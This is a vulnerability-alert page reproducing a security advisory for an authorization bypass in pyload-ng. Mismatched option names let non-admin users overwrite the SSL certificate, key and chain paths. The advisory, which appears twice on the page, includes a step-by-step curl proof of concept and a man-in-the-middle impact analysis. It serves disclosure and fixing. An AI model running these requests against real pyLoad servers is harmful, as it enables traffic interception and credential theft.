Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
6.8
pyLoad Download Manager: Unauthorized Access to SSL Certificates
CVE-2026-35586
GHSA-ppvx-rwh9-7rj7
Summary
pyLoad's download manager has a security weakness that allows any user to change the SSL certificate and key file paths, potentially allowing unauthorized access to the system. This issue can be fixed by updating to the latest version of pyLoad. Users with administrative access to the download manager should check their configuration and ensure they are using the latest version.
What to do
- Update pyload-ng to version 0.5.0b3.dev97.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | pyload-ng | <= 0.5.0b3.dev97 | 0.5.0b3.dev97 |
Original title
pyload-ng: Authorization Bypass for SSL Certificate/Key Configuration Due to Option Name Mismatch in pyload-ng
Original description
## Summary
The `ADMIN_ONLY_CORE_OPTIONS` authorization set in `set_config_value()` uses incorrect option names `ssl_cert` and `ssl_key`, while the actual configuration option names are `ssl_certfile` and `ssl_keyfile`. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the `ssl_certchain` option was never added to the admin-only set at all.
## Details
The vulnerability is in `src/pyload/core/api/__init__.py`. The `ADMIN_ONLY_CORE_OPTIONS` set is defined at lines 237-248:
```python
ADMIN_ONLY_CORE_OPTIONS = {
("general", "storage_folder"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "password"),
("proxy", "username"),
("reconnect", "script"),
("webui", "host"),
("webui", "ssl_cert"), # BUG: should be "ssl_certfile"
("webui", "ssl_key"), # BUG: should be "ssl_keyfile"
("webui", "use_ssl"),
}
# NOTE: ("webui", "ssl_certchain") is entirely missing
```
The actual config option names are defined in `src/pyload/core/config/default.cfg:39-41`:
```
file ssl_certfile : "SSL Certificate" = ssl.crt
file ssl_keyfile : "SSL Key" = ssl.key
file ssl_certchain : "CA's intermediate certificate bundle (optional)" =
```
The authorization check at line 267 compares the incoming `(category, option)` tuple against this set:
```python
if (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:
self.pyload.log.error(...)
return
```
When a request arrives with `option=ssl_certfile`, the check evaluates `("webui", "ssl_certfile") in ADMIN_ONLY_CORE_OPTIONS` which is **False** because the set contains `("webui", "ssl_cert")`, not `("webui", "ssl_certfile")`. The admin-only guard is bypassed and `config.set()` at line 271 proceeds to write the attacker-supplied value.
The value is cast as a `file` type in `parser.py:300-305`, which resolves it via `os.path.realpath()` but performs no further validation:
```python
elif typ in ("file", "folder"):
return (
""
if value in (None, "")
else os.path.realpath(os.path.expanduser(os.fsdecode(value)))
)
```
On server restart with SSL enabled, the webserver loads the attacker-controlled paths (`webserver_thread.py:22-23,51-52`):
```python
self.certfile = self.pyload.config.get("webui", "ssl_certfile")
self.keyfile = self.pyload.config.get("webui", "ssl_keyfile")
# ...
self.server.ssl_adapter = BuiltinSSLAdapter(
self.certfile, self.keyfile, self.certchain
)
```
## PoC
Prerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.
**Step 1:** Authenticate as the non-admin user to get a session cookie:
```bash
curl -c cookies.txt -X POST 'http://localhost:8000/login' \
-d 'username=settingsuser&password=password123'
```
**Step 2:** Set the SSL certificate to an attacker-controlled file path:
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'
```
Expected response: `true` (config saved successfully)
**Step 3:** Set the SSL key to an attacker-controlled file path:
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'
```
Expected response: `true` (config saved successfully)
**Step 4:** Set the SSL certificate chain (never protected):
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'
```
Expected response: `true` (config saved successfully)
**Step 5:** After the server restarts, it will load the attacker's certificate and key for all HTTPS connections.
## Impact
A non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker's certificate/key pair. This enables:
- **Man-in-the-Middle attacks:** The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens.
- **Credential theft:** All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker.
- **Configuration tampering:** With intercepted admin credentials, the attacker can escalate to full admin access.
The attack requires SSL to already be enabled by an admin (the `use_ssl` option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad's download functionality), and a server restart.
## Recommended Fix
Fix the option names in `ADMIN_ONLY_CORE_OPTIONS` and add the missing `ssl_certchain` option in `src/pyload/core/api/__init__.py`:
```python
ADMIN_ONLY_CORE_OPTIONS = {
("general", "storage_folder"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "password"),
("proxy", "username"),
("reconnect", "script"),
("webui", "host"),
("webui", "ssl_certfile"), # Fixed: was "ssl_cert"
("webui", "ssl_keyfile"), # Fixed: was "ssl_key"
("webui", "ssl_certchain"), # Added: was missing entirely
("webui", "use_ssl"),
}
```
The `ADMIN_ONLY_CORE_OPTIONS` authorization set in `set_config_value()` uses incorrect option names `ssl_cert` and `ssl_key`, while the actual configuration option names are `ssl_certfile` and `ssl_keyfile`. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the `ssl_certchain` option was never added to the admin-only set at all.
## Details
The vulnerability is in `src/pyload/core/api/__init__.py`. The `ADMIN_ONLY_CORE_OPTIONS` set is defined at lines 237-248:
```python
ADMIN_ONLY_CORE_OPTIONS = {
("general", "storage_folder"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "password"),
("proxy", "username"),
("reconnect", "script"),
("webui", "host"),
("webui", "ssl_cert"), # BUG: should be "ssl_certfile"
("webui", "ssl_key"), # BUG: should be "ssl_keyfile"
("webui", "use_ssl"),
}
# NOTE: ("webui", "ssl_certchain") is entirely missing
```
The actual config option names are defined in `src/pyload/core/config/default.cfg:39-41`:
```
file ssl_certfile : "SSL Certificate" = ssl.crt
file ssl_keyfile : "SSL Key" = ssl.key
file ssl_certchain : "CA's intermediate certificate bundle (optional)" =
```
The authorization check at line 267 compares the incoming `(category, option)` tuple against this set:
```python
if (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:
self.pyload.log.error(...)
return
```
When a request arrives with `option=ssl_certfile`, the check evaluates `("webui", "ssl_certfile") in ADMIN_ONLY_CORE_OPTIONS` which is **False** because the set contains `("webui", "ssl_cert")`, not `("webui", "ssl_certfile")`. The admin-only guard is bypassed and `config.set()` at line 271 proceeds to write the attacker-supplied value.
The value is cast as a `file` type in `parser.py:300-305`, which resolves it via `os.path.realpath()` but performs no further validation:
```python
elif typ in ("file", "folder"):
return (
""
if value in (None, "")
else os.path.realpath(os.path.expanduser(os.fsdecode(value)))
)
```
On server restart with SSL enabled, the webserver loads the attacker-controlled paths (`webserver_thread.py:22-23,51-52`):
```python
self.certfile = self.pyload.config.get("webui", "ssl_certfile")
self.keyfile = self.pyload.config.get("webui", "ssl_keyfile")
# ...
self.server.ssl_adapter = BuiltinSSLAdapter(
self.certfile, self.keyfile, self.certchain
)
```
## PoC
Prerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.
**Step 1:** Authenticate as the non-admin user to get a session cookie:
```bash
curl -c cookies.txt -X POST 'http://localhost:8000/login' \
-d 'username=settingsuser&password=password123'
```
**Step 2:** Set the SSL certificate to an attacker-controlled file path:
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'
```
Expected response: `true` (config saved successfully)
**Step 3:** Set the SSL key to an attacker-controlled file path:
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'
```
Expected response: `true` (config saved successfully)
**Step 4:** Set the SSL certificate chain (never protected):
```bash
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
-H 'Content-Type: application/json' \
-d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'
```
Expected response: `true` (config saved successfully)
**Step 5:** After the server restarts, it will load the attacker's certificate and key for all HTTPS connections.
## Impact
A non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker's certificate/key pair. This enables:
- **Man-in-the-Middle attacks:** The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens.
- **Credential theft:** All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker.
- **Configuration tampering:** With intercepted admin credentials, the attacker can escalate to full admin access.
The attack requires SSL to already be enabled by an admin (the `use_ssl` option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad's download functionality), and a server restart.
## Recommended Fix
Fix the option names in `ADMIN_ONLY_CORE_OPTIONS` and add the missing `ssl_certchain` option in `src/pyload/core/api/__init__.py`:
```python
ADMIN_ONLY_CORE_OPTIONS = {
("general", "storage_folder"),
("log", "syslog_host"),
("log", "syslog_port"),
("proxy", "password"),
("proxy", "username"),
("reconnect", "script"),
("webui", "host"),
("webui", "ssl_certfile"), # Fixed: was "ssl_cert"
("webui", "ssl_keyfile"), # Fixed: was "ssl_key"
("webui", "ssl_certchain"), # Added: was missing entirely
("webui", "use_ssl"),
}
```
nvd CVSS3.1
6.8
Vulnerability type
CWE-863
Incorrect Authorization
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 7 Apr 2026